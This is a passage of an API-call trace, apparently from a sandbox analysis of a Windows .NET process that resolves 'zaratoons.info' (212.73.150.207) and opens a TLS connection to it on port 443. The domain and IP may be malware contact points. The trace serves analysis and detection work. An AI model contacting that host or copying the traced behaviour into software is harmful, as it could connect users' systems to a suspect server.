	[0830.698] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2e37020, cbSid=0x1c7dd1e0 | out: pSid=0x2e37020*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c7dd1e0) returned 1
	[0830.698] CreateMutexW (lpMutexAttributes=0x2e371d8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0830.698] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x410
	[0830.698] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x1f4) returned 0x0
	[0830.699] ReleaseMutex (hMutex=0x410) returned 1
	[0830.699] CloseHandle (hObject=0x410) returned 1
	[0830.700] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2e37e58, cbSid=0x1c7dd1e0 | out: pSid=0x2e37e58*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c7dd1e0) returned 1
	[0830.700] CreateMutexW (lpMutexAttributes=0x2e38010, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0830.700] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x410
	[0830.700] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x1f4) returned 0x0
	[0830.701] ReleaseMutex (hMutex=0x410) returned 1
	[0830.701] CloseHandle (hObject=0x410) returned 1
	[0830.701] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2e38ca0, cbSid=0x1c7dd1e0 | out: pSid=0x2e38ca0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c7dd1e0) returned 1
	[0830.701] CreateMutexW (lpMutexAttributes=0x2e38e58, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0830.702] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x410
	[0830.702] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x1f4) returned 0x0
	[0830.703] ReleaseMutex (hMutex=0x410) returned 1
	[0830.703] CloseHandle (hObject=0x410) returned 1
	[0830.703] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2e39ae0, cbSid=0x1c7dd1e0 | out: pSid=0x2e39ae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c7dd1e0) returned 1
	[0830.703] CreateMutexW (lpMutexAttributes=0x2e39c98, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0830.703] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x410
	[0830.704] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x1f4) returned 0x0
	[0830.704] ReleaseMutex (hMutex=0x410) returned 1
	[0830.704] CloseHandle (hObject=0x410) returned 1
	[0830.708] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x410
	[0830.709] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x41c
	[0830.710] ioctlsocket (in: s=0x410, cmd=-2147195266, argp=0x1c7dd818 | out: argp=0x1c7dd818) returned 0
	[0830.710] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x420
	[0830.710] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x424
	[0830.710] ioctlsocket (in: s=0x420, cmd=-2147195266, argp=0x1c7dd818 | out: argp=0x1c7dd818) returned 0
	[0830.711] WSAIoctl (in: s=0x410, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c7dd790, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c7dd790, lpOverlapped=0x0) returned -1
	[0830.713] CoTaskMemAlloc (cb=0x204) returned 0x447010
	[0830.713] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x447010, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0830.713] CoTaskMemFree (pv=0x447010) 
	[0830.715] WSAEventSelect (s=0x410, hEventObject=0x41c, lNetworkEvents=512) returned 0
	[0830.715] WSAIoctl (in: s=0x420, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c7dd790, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c7dd790, lpOverlapped=0x0) returned -1
	[0830.715] CoTaskMemAlloc (cb=0x204) returned 0x447010
	[0830.715] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x447010, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0830.715] CoTaskMemFree (pv=0x447010) 
	[0830.715] WSAEventSelect (s=0x420, hEventObject=0x424, lNetworkEvents=512) returned 0
	[0830.715] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x428
	[0830.716] RasConnectionNotificationW (param_1=0xffffffffffffffff, param_2=0x428, param_3=0x3) returned 0x0
	[0833.197] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x1c7dd8d0 | out: phkResult=0x1c7dd8d0*=0x440) returned 0x0
	[0833.199] RegOpenKeyExW (in: hKey=0x440, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c7dd7b8 | out: phkResult=0x1c7dd7b8*=0x444) returned 0x0
	[0833.200] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x448
	[0833.200] RegNotifyChangeKeyValue (hKey=0x444, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x448, fAsynchronous=1) returned 0x0
	[0833.201] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c7dd7e0 | out: phkResult=0x1c7dd7e0*=0x44c) returned 0x0
	[0833.202] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x450
	[0833.202] RegNotifyChangeKeyValue (hKey=0x44c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x450, fAsynchronous=1) returned 0x0
	[0833.202] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c7dd7e0 | out: phkResult=0x1c7dd7e0*=0x454) returned 0x0
	[0833.202] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x458
	[0833.202] RegNotifyChangeKeyValue (hKey=0x454, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x458, fAsynchronous=1) returned 0x0
	[0833.202] GetCurrentProcess () returned 0xffffffffffffffff
	[0833.202] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dd748 | out: TokenHandle=0x1c7dd748*=0x45c) returned 1
	[0833.210] GetCurrentProcess () returned 0xffffffffffffffff
	[0833.210] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dcf18 | out: TokenHandle=0x1c7dcf18*=0x460) returned 1
	[0833.216] GetCurrentProcess () returned 0xffffffffffffffff
	[0833.216] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dcf18 | out: TokenHandle=0x1c7dcf18*=0x464) returned 1
	[0835.394] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x1c7dd818 | out: pProxyConfig=0x1c7dd818) returned 1
	[0839.571] SetEvent (hEvent=0x384) returned 1
	[0841.006] GetCurrentProcess () returned 0xffffffffffffffff
	[0841.006] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dcf88 | out: TokenHandle=0x1c7dcf88*=0x4b4) returned 1
	[0841.010] GetCurrentProcess () returned 0xffffffffffffffff
	[0841.010] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dcf88 | out: TokenHandle=0x1c7dcf88*=0x4b8) returned 1
	[0841.011] SetEvent (hEvent=0x384) returned 1
	[0844.360] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x1c7dd458 | out: pFixedInfo=0x0, pOutBufLen=0x1c7dd458) returned 0x6f
	[0844.688] LocalAlloc (uFlags=0x0, uBytes=0x258) returned 0x1b8c83a0
	[0844.689] GetNetworkParams (in: pFixedInfo=0x1b8c83a0, pOutBufLen=0x1c7dd458 | out: pFixedInfo=0x1b8c83a0, pOutBufLen=0x1c7dd458) returned 0x0
	[0846.112] CoTaskMemAlloc (cb=0xd) returned 0x1b8c2320
	[0846.112] inet_addr (cp="192.168.0.1") returned 0x100a8c0
	[0846.112] CoTaskMemFree (pv=0x1b8c2320) 
	[0846.115] LocalFree (hMem=0x1b8c83a0) returned 0x0
	[0846.129] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4cc
	[0846.130] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4c8
	[0846.133] CoTaskMemAlloc (cb=0x10) returned 0x1b8c2320
	[0846.134] getaddrinfo (in: pNodeName="zaratoons.info", pServiceName=0x0, pHints=0x1c7dd400*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1c7dd3f8 | out: ppResult=0x1c7dd3f8*=0x1b8c6ec0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="zaratoons.info", ai_addr=0x1b8c2380*(sa_family=2, sin_port=0x0, sin_addr="212.73.150.207"), ai_next=0x0)) returned 0
	[0849.127] CoTaskMemFree (pv=0x1b8c2320) 
	[0849.128] CoTaskMemFree (pv=0x0) 
	[0849.129] FreeAddrInfoW (pAddrInfo=0x1b8c6ec0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="慺慲潴湯⹳湩潦", ai_addr=0x1b8c2380*(sa_family=2, sin_port=0x0, sin_addr="212.73.150.207"), ai_next=0x0)) 
	[0849.130] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4dc
	[0849.130] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4d4
	[0849.130] ioctlsocket (in: s=0x4dc, cmd=-2147195266, argp=0x1c7dd418 | out: argp=0x1c7dd418) returned 0
	[0849.131] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4e4
	[0849.131] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4e8
	[0849.131] ioctlsocket (in: s=0x4e4, cmd=-2147195266, argp=0x1c7dd418 | out: argp=0x1c7dd418) returned 0
	[0849.131] WSAIoctl (in: s=0x4dc, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c7dd390, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c7dd390, lpOverlapped=0x0) returned -1
	[0849.131] CoTaskMemAlloc (cb=0x204) returned 0x447640
	[0849.131] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x447640, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0849.131] CoTaskMemFree (pv=0x447640) 
	[0849.131] WSAEventSelect (s=0x4dc, hEventObject=0x4d4, lNetworkEvents=512) returned 0
	[0849.131] WSAIoctl (in: s=0x4e4, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c7dd390, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c7dd390, lpOverlapped=0x0) returned -1
	[0849.131] CoTaskMemAlloc (cb=0x204) returned 0x447640
	[0849.131] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x447640, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0849.131] CoTaskMemFree (pv=0x447640) 
	[0849.131] WSAEventSelect (s=0x4e4, hEventObject=0x4e8, lNetworkEvents=512) returned 0
	[0849.133] GetAdaptersAddresses () returned 0x6f
	[0850.379] LocalAlloc (uFlags=0x0, uBytes=0xbe8) returned 0x1b8d91e0
	[0850.379] GetAdaptersAddresses () returned 0x0
	[0850.389] LocalFree (hMem=0x1b8d91e0) returned 0x0
	[0850.397] WSAConnect (in: s=0x4cc, name=0x2e45628*(sa_family=2, sin_port=0x1bb, sin_addr="212.73.150.207"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0850.499] closesocket (s=0x4c8) returned 0
	[0850.554] EnumerateSecurityPackagesW (in: pcPackages=0x1c7dd278, ppPackageInfo=0x1c7dd270 | out: pcPackages=0x1c7dd278, ppPackageInfo=0x1c7dd270) returned 0x0
	[0850.561] lstrlenW (lpString="Negotiate") returned 9
	[0850.562] CoTaskMemAlloc (cb=0x16) returned 0x1b8c2360
	[0850.562] RtlMoveMemory (in: Destination=0x1b8c2360, Source=0x3d4f00, Length=0x14 | out: Destination=0x1b8c2360) 
	[0850.562] CoTaskMemFree (pv=0x1b8c2360) 
	[0850.562] lstrlenW (lpString="Microsoft Package Negotiator") returned 28
	[0850.563] CoTaskMemAlloc (cb=0x3c) returned 0x1b8d60b0
	[0850.563] RtlMoveMemory (in: Destination=0x1b8d60b0, Source=0x3d4f14, Length=0x3a | out: Destination=0x1b8d60b0) 
	[0850.563] CoTaskMemFree (pv=0x1b8d60b0) 
	[0850.563] lstrlenW (lpString="NegoExtender") returned 12
	[0850.563] CoTaskMemAlloc (cb=0x1c) returned 0x1b8cb010
	[0850.563] RtlMoveMemory (in: Destination=0x1b8cb010, Source=0x3d4f4e, Length=0x1a | out: Destination=0x1b8cb010) 
	[0850.563] CoTaskMemFree (pv=0x1b8cb010) 
	[0850.563] lstrlenW (lpString="NegoExtender Security Package") returned 29
	[0850.563] CoTaskMemAlloc (cb=0x3e) returned 0x1b8d60b0
	[0850.563] RtlMoveMemory (in: Destination=0x1b8d60b0, Source=0x3d4f68, Length=0x3c | out: Destination=0x1b8d60b0) 
	[0850.564] CoTaskMemFree (pv=0x1b8d60b0) 
	[0850.564] lstrlenW (lpString="Kerberos") returned 8
	[0850.564] CoTaskMemAlloc (cb=0x14) returned 0x1b8c2360
	[0850.564] RtlMoveMemory (in: Destination=0x1b8c2360, Source=0x3d4fa4, Length=0x12 | out: Destination=0x1b8c2360) 
	[0850.564] CoTaskMemFree (pv=0x1b8c2360) 
	[0850.564] lstrlenW (lpString="Microsoft Kerberos V1.0") returned 23
	[0850.564] CoTaskMemAlloc (cb=0x32) returned 0x1b8c6f40
	[0850.564] RtlMoveMemory (in: Destination=0x1b8c6f40, Source=0x3d4fb6, Length=0x30 | out: Destination=0x1b8c6f40) 
	[0850.564] CoTaskMemFree (pv=0x1b8c6f40) 
	[0850.564] lstrlenW (lpString="NTLM") returned 4
	[0850.564] CoTaskMemAlloc (cb=0xc) returned 0x1b8c2360
	[0850.564] RtlMoveMemory (in: Destination=0x1b8c2360, Source=0x3d4fe6, Length=0xa | out: Destination=0x1b8c2360) 
	[0850.564] CoTaskMemFree (pv=0x1b8c2360) 
	[0850.564] lstrlenW (lpString="NTLM Security Package") returned 21
	[0850.564] CoTaskMemAlloc (cb=0x2e) returned 0x1b8c6f40
	[0850.564] RtlMoveMemory (in: Destination=0x1b8c6f40, Source=0x3d4ff0, Length=0x2c | out: Destination=0x1b8c6f40) 
	[0850.564] CoTaskMemFree (pv=0x1b8c6f40) 
	[0850.564] lstrlenW (lpString="Schannel") returned 8
	[0850.564] CoTaskMemAlloc (cb=0x14) returned 0x1b8c2360
	[0850.565] RtlMoveMemory (in: Destination=0x1b8c2360, Source=0x3d501c, Length=0x12 | out: Destination=0x1b8c2360) 
	[0850.565] CoTaskMemFree (pv=0x1b8c2360) 
	[0850.565] lstrlenW (lpString="Schannel Security Package") returned 25
	[0850.565] CoTaskMemAlloc (cb=0x36) returned 0x1b8c6f40
	[0850.565] RtlMoveMemory (in: Destination=0x1b8c6f40, Source=0x3d502e, Length=0x34 | out: Destination=0x1b8c6f40) 
	[0850.565] CoTaskMemFree (pv=0x1b8c6f40) 
	[0850.565] lstrlenW (lpString="Microsoft Unified Security Protocol Provider") returned 44
	[0850.565] CoTaskMemAlloc (cb=0x5c) returned 0x1b8af850
	[0850.565] RtlMoveMemory (in: Destination=0x1b8af850, Source=0x3d5062, Length=0x5a | out: Destination=0x1b8af850) 
	[0850.565] CoTaskMemFree (pv=0x1b8af850) 
	[0850.565] lstrlenW (lpString="Schannel Security Package") returned 25
	[0850.565] CoTaskMemAlloc (cb=0x36) returned 0x1b8c6f40
	[0850.565] RtlMoveMemory (in: Destination=0x1b8c6f40, Source=0x3d50bc, Length=0x34 | out: Destination=0x1b8c6f40) 
	[0850.565] CoTaskMemFree (pv=0x1b8c6f40) 
	[0850.565] lstrlenW (lpString="WDigest") returned 7
	[0850.565] CoTaskMemAlloc (cb=0x12) returned 0x1b8c2360
	[0850.565] RtlMoveMemory (in: Destination=0x1b8c2360, Source=0x3d50f0, Length=0x10 | out: Destination=0x1b8c2360) 
	[0850.565] CoTaskMemFree (pv=0x1b8c2360) 
	[0850.566] lstrlenW (lpString="Digest Authentication for Windows") returned 33
	[0850.566] CoTaskMemAlloc (cb=0x46) returned 0x1b8d60b0
	[0850.566] RtlMoveMemory (in: Destination=0x1b8d60b0, Source=0x3d5100, Length=0x44 | out: Destination=0x1b8d60b0) 
	[0850.566] CoTaskMemFree (pv=0x1b8d60b0) 
	[0850.566] lstrlenW (lpString="TSSSP") returned 5
	[0850.566] CoTaskMemAlloc (cb=0xe) returned 0x1b8c2360
	[0850.566] RtlMoveMemory (in: Destination=0x1b8c2360, Source=0x3d5144, Length=0xc | out: Destination=0x1b8c2360) 
	[0850.566] CoTaskMemFree (pv=0x1b8c2360) 
	[0850.566] lstrlenW (lpString="TS Service Security Package") returned 27
	[0850.566] CoTaskMemAlloc (cb=0x3a) returned 0x1b8d60b0
	[0850.566] RtlMoveMemory (in: Destination=0x1b8d60b0, Source=0x3d5150, Length=0x38 | out: Destination=0x1b8d60b0) 
	[0850.566] CoTaskMemFree (pv=0x1b8d60b0) 
	[0850.566] lstrlenW (lpString="pku2u") returned 5
	[0850.566] CoTaskMemAlloc (cb=0xe) returned 0x1b8c2360
	[0850.566] RtlMoveMemory (in: Destination=0x1b8c2360, Source=0x3d5188, Length=0xc | out: Destination=0x1b8c2360) 
	[0850.566] CoTaskMemFree (pv=0x1b8c2360) 
	[0850.566] lstrlenW (lpString="PKU2U Security Package") returned 22
	[0850.566] CoTaskMemAlloc (cb=0x30) returned 0x1b8c6f40
	[0850.566] RtlMoveMemory (in: Destination=0x1b8c6f40, Source=0x3d5194, Length=0x2e | out: Destination=0x1b8c6f40) 
	[0850.567] CoTaskMemFree (pv=0x1b8c6f40) 
	[0850.567] lstrlenW (lpString="CREDSSP") returned 7
	[0850.567] CoTaskMemAlloc (cb=0x12) returned 0x1b8c2360
	[0850.567] RtlMoveMemory (in: Destination=0x1b8c2360, Source=0x3d51c2, Length=0x10 | out: Destination=0x1b8c2360) 
	[0850.567] CoTaskMemFree (pv=0x1b8c2360) 
	[0850.567] lstrlenW (lpString="Microsoft CredSSP Security Provider") returned 35
	[0850.567] CoTaskMemAlloc (cb=0x4a) returned 0x1b8d4d40
	[0850.567] RtlMoveMemory (in: Destination=0x1b8d4d40, Source=0x3d51d2, Length=0x48 | out: Destination=0x1b8d4d40) 
	[0850.567] CoTaskMemFree (pv=0x1b8d4d40) 
	[0850.567] FreeContextBuffer (in: pvContextBuffer=0x3d4dc0 | out: pvContextBuffer=0x3d4dc0) returned 0x0
	[0852.333] GetCurrentProcess () returned 0xffffffffffffffff
	[0852.334] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dcd58 | out: TokenHandle=0x1c7dcd58*=0x4c8) returned 1
	[0852.338] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x2e497e0, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x1c7dcc68, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x1c7dcc58, ptsExpiry=0x1c7dcc50 | out: phCredential=0x1c7dcc58, ptsExpiry=0x1c7dcc50) returned 0x0
	[0852.346] InitializeSecurityContextW (in: phCredential=0x1c7dce60, phContext=0x0, pTargetName=0x2e3e248, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x1c7dce50, pOutput=0x2e4bf28, pfContextAttr=0x1c7dce48, ptsExpiry=0x1c7dce40 | out: phNewContext=0x1c7dce50, pOutput=0x2e4bf28, pfContextAttr=0x1c7dce48, ptsExpiry=0x1c7dce40) returned 0x90312
	[0852.347] FreeContextBuffer (in: pvContextBuffer=0x1b8bb960 | out: pvContextBuffer=0x1b8bb960) returned 0x0
	[0852.357] send (s=0x4cc, buf=0x2e4bff8*, len=118, flags=0) returned 118
	[0852.358] recv (in: s=0x4cc, buf=0x2e4bff8, len=5, flags=0 | out: buf=0x2e4bff8*) returned 5
	[0852.447] recv (in: s=0x4cc, buf=0x2e4bffd, len=93, flags=0 | out: buf=0x2e4bffd*) returned 93
	[0852.448] InitializeSecurityContextW (in: phCredential=0x1c7dcd80, phContext=0x1c7dd030, pTargetName=0x2e3e248, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2e4c308, Reserved2=0x0, phNewContext=0x1c7dcd70, pOutput=0x2e4c328, pfContextAttr=0x1c7dcd68, ptsExpiry=0x1c7dcd60 | out: phNewContext=0x1c7dcd70, pOutput=0x2e4c328, pfContextAttr=0x1c7dcd68, ptsExpiry=0x1c7dcd60) returned 0x90312
	[0852.510] recv (in: s=0x4cc, buf=0x2e4c418, len=5, flags=0 | out: buf=0x2e4c418*) returned 5
	[0852.510] recv (in: s=0x4cc, buf=0x2e4c43d, len=2556, flags=0 | out: buf=0x2e4c43d*) returned 2556
	[0852.510] InitializeSecurityContextW (in: phCredential=0x1c7dccb0, phContext=0x1c7dcf60, pTargetName=0x2e3e248, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2e4cf10, Reserved2=0x0, phNewContext=0x1c7dcca0, pOutput=0x2e4cf30, pfContextAttr=0x1c7dcc98, ptsExpiry=0x1c7dcc90 | out: phNewContext=0x1c7dcca0, pOutput=0x2e4cf30, pfContextAttr=0x1c7dcc98, ptsExpiry=0x1c7dcc90) returned 0x90312
	[0852.519] recv (in: s=0x4cc, buf=0x2e4d020, len=5, flags=0 | out: buf=0x2e4d020*) returned 5
	[0852.519] recv (in: s=0x4cc, buf=0x2e4d045, len=331, flags=0 | out: buf=0x2e4d045*) returned 331
	[0852.520] InitializeSecurityContextW (in: phCredential=0x1c7dcbe0, phContext=0x1c7dce90, pTargetName=0x2e3e248, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2e4d260, Reserved2=0x0, phNewContext=0x1c7dcbd0, pOutput=0x2e4d280, pfContextAttr=0x1c7dcbc8, ptsExpiry=0x1c7dcbc0 | out: phNewContext=0x1c7dcbd0, pOutput=0x2e4d280, pfContextAttr=0x1c7dcbc8, ptsExpiry=0x1c7dcbc0) returned 0x90312
	[0852.520] recv (in: s=0x4cc, buf=0x2e4d370, len=5, flags=0 | out: buf=0x2e4d370*) returned 5
	[0852.520] recv (in: s=0x4cc, buf=0x2e4d395, len=4, flags=0 | out: buf=0x2e4d395*) returned 4
	[0852.520] InitializeSecurityContextW (in: phCredential=0x1c7dcb10, phContext=0x1c7dcdc0, pTargetName=0x2e3e248, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2e4d470, Reserved2=0x0, phNewContext=0x1c7dcb00, pOutput=0x2e4d490, pfContextAttr=0x1c7dcaf8, ptsExpiry=0x1c7dcaf0 | out: phNewContext=0x1c7dcb00, pOutput=0x2e4d490, pfContextAttr=0x1c7dcaf8, ptsExpiry=0x1c7dcaf0) returned 0x90312
	[0852.528] FreeContextBuffer (in: pvContextBuffer=0x1b8b6b50 | out: pvContextBuffer=0x1b8b6b50) returned 0x0
	[0852.529] send (s=0x4cc, buf=0x2e4d560*, len=134, flags=0) returned 134
	[0852.529] recv (in: s=0x4cc, buf=0x2e4d560, len=5, flags=0 | out: buf=0x2e4d560*) returned 5
	[0852.623] recv (in: s=0x4cc, buf=0x2e4d565, len=1, flags=0 | out: buf=0x2e4d565*) returned 1
	[0852.623] InitializeSecurityContextW (in: phCredential=0x1c7dca40, phContext=0x1c7dccf0, pTargetName=0x2e3e248, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2e4d6d8, Reserved2=0x0, phNewContext=0x1c7dca30, pOutput=0x2e4d6f8, pfContextAttr=0x1c7dca28, ptsExpiry=0x1c7dca20 | out: phNewContext=0x1c7dca30, pOutput=0x2e4d6f8, pfContextAttr=0x1c7dca28, ptsExpiry=0x1c7dca20) returned 0x90312
	[0852.624] recv (in: s=0x4cc, buf=0x2e4d7e8, len=5, flags=0 | out: buf=0x2e4d7e8*) returned 5
	[0852.624] recv (in: s=0x4cc, buf=0x2e4d80d, len=48, flags=0 | out: buf=0x2e4d80d*) returned 48
	[0852.624] InitializeSecurityContextW (in: phCredential=0x1c7dc970, phContext=0x1c7dcc20, pTargetName=0x2e3e248, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2e4d910, Reserved2=0x0, phNewContext=0x1c7dc960, pOutput=0x2e4d930, pfContextAttr=0x1c7dc958, ptsExpiry=0x1c7dc950 | out: phNewContext=0x1c7dc960, pOutput=0x2e4d930, pfContextAttr=0x1c7dc958, ptsExpiry=0x1c7dc950) returned 0x0
	[0852.637] QueryContextAttributesW (in: phContext=0x1c7dcbd0, ulAttribute=0x4, pBuffer=0x2e4da48 | out: pBuffer=0x2e4da48) returned 0x0
	[0852.638] QueryContextAttributesW (in: phContext=0x1c7dcbd0, ulAttribute=0x5a, pBuffer=0x2e4dac8 | out: pBuffer=0x2e4dac8) returned 0x0
	[0852.649] QueryContextAttributesW (in: phContext=0x1c7dca80, ulAttribute=0x53, pBuffer=0x2e4de18 | out: pBuffer=0x2e4de18) returned 0x0
	[0852.656] CertDuplicateCRLContext (pCrlContext=0x1b8b3760) returned 0x1b8b3760
	[0852.659] CertDuplicateStore (hCertStore=0x1b8ddc80) returned 0x1b8ddc80
	[0852.660] CertEnumCertificatesInStore (hCertStore=0x1b8ddc80, pPrevCertContext=0x0) returned 0x1b8b37e0
	[0852.660] CertDuplicateCRLContext (pCrlContext=0x1b8b37e0) returned 0x1b8b37e0
	[0852.661] CertEnumCertificatesInStore (hCertStore=0x1b8ddc80, pPrevCertContext=0x1b8b37e0) returned 0x1b8b3760
	[0852.661] CertDuplicateCRLContext (pCrlContext=0x1b8b3760) returned 0x1b8b3760
	[0852.661] CertEnumCertificatesInStore (hCertStore=0x1b8ddc80, pPrevCertContext=0x1b8b3760) returned 0x0
	[0852.661] CertCloseStore (hCertStore=0x1b8ddc80, dwFlags=0x0) returned 1
	[0852.664] CertFreeCRLContext (pCrlContext=0x1b8b3760) returned 1
	[0852.673] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x1b8ddd50
